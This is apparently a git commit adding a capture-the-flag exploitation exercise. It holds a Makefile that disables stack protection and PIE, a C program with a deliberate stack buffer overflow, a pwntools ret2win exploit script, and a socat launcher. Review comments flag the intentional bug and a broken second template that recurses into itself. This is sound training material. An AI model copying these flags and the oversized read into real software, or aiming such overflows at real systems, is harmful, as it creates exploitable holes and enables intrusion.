Commit 5264bf46 authored by dex's avatar dex

add pwn template and first example

CC=gcc
main: main.c
$(CC) -no-pie -fno-pic -m32 -O0 -fno-stack-protector -o $@ $^
# -no-pie option for linking
# -fno-pic used for compilation
clean:
rm -f main main.o
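Review bot: `clean` is not declared phony, so a file named `clean` in the directory would silently make `make clean` a no-op; add `.PHONY: clean` above the rule. The recipe also removes `main.o`, which this Makefile never produces because the single `main: main.c` rule compiles and links in one step. The compiler flags are hard-coded in the recipe rather than in a variable, so `make CFLAGS=...` has no effect; `CFLAGS := -no-pie -fno-pic -m32 -O0 -fno-stack-protector` and `$(CC) $(CFLAGS) -o $@ $^` keeps them overridable. The comments on `-no-pie` and `-fno-pic` say what the options are for, but nothing says that `-fno-stack-protector` and `-O0` are deliberate mitigation opt-outs for the exercise; a one-line `# mitigations disabled on purpose: training target only, do not reuse these flags` would make that explicit.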
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void vuln(){
char buf[16];
ssize_t nread = read(STDIN_FILENO, buf, 256);
printf("%i bytes read\n", nread);
}
void secret(){
printf("You won!\n");
exit(0);
}
int main(int argc, char** argv){
printf("Welcome!\n");
printf("Gimme some bytes: ");
fflush(stdout);
vuln();
printf("Thanks. Bye!\n");
return 0;
}
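Review bot: `vuln()` passes a 256-byte length for the 16-byte `buf` to `read()` with no comment marking it as the intentional defect of the exercise, so a reader cannot tell it from an accidental one; add `/* deliberately oversized read: this is the exercise's bug, never copy into real code */` above the call. The return value is printed with `%i` although `nread` is `ssize_t`; that only matches under `-m32`, so `%zd` is the portable spelling, and a `-1` (read error) is printed as a byte count rather than handled. `argc` and `argv` in `main` are unused and could be dropped to `int main(void)`.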
#!/usr/bin/env python
import sys
import os
from pwn import *
### SETUP ###
LOCAL=True
context.log_level = 'info'
#context.log_level = 'debug'
### SPLOIT ###
def sploit():
log.info(p.recvuntil("\n")) # consume until \n
log.info(p.recvuntil(": "))
p.sendline((0x1c+0x4) * "A" + p32(elf.sym["secret"]))
p.interactive()
return
if __name__=="__main__":
elf = ELF("./main")
if LOCAL:
p = process("./main")
"""
p = gdb.debug('./main', '''
b *0x0804850a
c
''')
"""
#gdb.attach(p)
#HOST = "127.0.0.1"
#PORT = 1337
#p = remote(HOST, PORT)
else:
HOST = "192.168.1.123"
PORT = 4242
p = remote(HOST, PORT)
sploit()
"""
0x08048508 <+18>: push 0x0
=> 0x0804850a <+20>: call 0x8048390 <read@plt>
0x0804850f <+25>: add esp,0x10
pwndbg> x/3wx $esp
0xffffcf10: 0x00000000 0xffffcf2c 0x00000100
pwndbg> x/wx $ebp
0xffffcf48: 0xffffcf58
pwndbg> p/x 0xffffcf48-0xffffcf2c
$1 = 0x1c --> buffer base to saved ebp
"""
#!/usr/bin/env bash
usage() { echo "Usage: ${FUNCNAME[1]} $1" && return 0; }
[[ $# -ne 2 ]] && usage "<levelXX> <port>" && exit 1
socat tcp-l:"$2",fork,reuseaddr EXEC:"stdbuf -o0 ./$1"
#socat tcp-l:"$2",fork,reuseaddr EXEC:"strace -v ./$1"
#socat tcp-l:"$2",fork,reuseaddr EXEC:"gdbserver ':1234' ./$1"
#!/usr/bin/env python
import sys
import os
from pwn import *
### SETUP ###
LOCAL=True
context.log_level = 'info'
#context.log_level = 'debug'
### SPLOIT ###
def sploit(addr):
log.info(p.recvuntil("\n")) # consume until \n
p.sendline(512 * "A" + sploit(0xDEADBEEF))
p.interactive()
if __name__=="__main__":
elf = ELF("./exploitme")
if LOCAL:
p = process("./exploitme")
#HOST = "127.0.0.1"
#PORT = 1337
#p = remote(HOST, PORT)
else:
HOST = "192.168.1.123"
PORT = 4242
p = remote(HOST, PORT)
sploit()
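Review bot: `sploit(addr)` is called as `sploit()` with no argument on the last line, and inside its own body calls itself as `sploit(0xDEADBEEF)`, so the template raises `TypeError` before sending anything and would recurse without end if it got past that; since this is a template, the body should be a placeholder that fails loudly, e.g. `raise NotImplementedError("fill in sploit() for this level")`, with the `addr` parameter either used or removed. `import sys` and `import os` are unused, as in the sibling script. As there, `p` and `elf` are module globals assigned under `__main__`; taking them as parameters would keep the template importable and testable.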